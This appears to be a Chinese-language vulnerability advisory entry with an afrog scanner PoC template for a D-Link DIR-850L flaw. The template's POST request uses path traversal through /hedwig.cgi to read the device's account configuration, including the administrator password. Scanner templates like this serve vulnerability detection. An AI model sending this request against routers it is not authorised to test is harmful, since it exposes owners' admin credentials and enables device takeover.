dlink-850l-password-leak: Dlink 850l Information Disclosure

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

当Dlink 850l的目录浏览功能开启时,攻击者可以通过访问/hedwig.cgi来获取设备的配置信息,包括管理员密码。

PoC代码[已公开]

id: dlink-850l-password-leak

info:
  name: Dlink 850l Information Disclosure
  author: cc_ci
  severity: high
  verified: true
  description: |-
    当Dlink 850l的目录浏览功能开启时,攻击者可以通过访问/hedwig.cgi来获取设备的配置信息,包括管理员密码。
  tags: dlink,disclosure
  created: 2023/10/29

rules:
  r0:
    request:
      method: POST
      path: /hedwig.cgi
      headers:
        Content-Type: text/xml
        Cookie: uid=R8tBjwtFc8
      body: <?xml version="1.0" encoding="utf-8"?><postxml><module><service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service></module></postxml>
    expression: response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"</usrid>") && response.body.bcontains(b"</password>") && response.body.bcontains(b"<result>OK</result>")
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/disclosure/dlink-850l-password-leak.yaml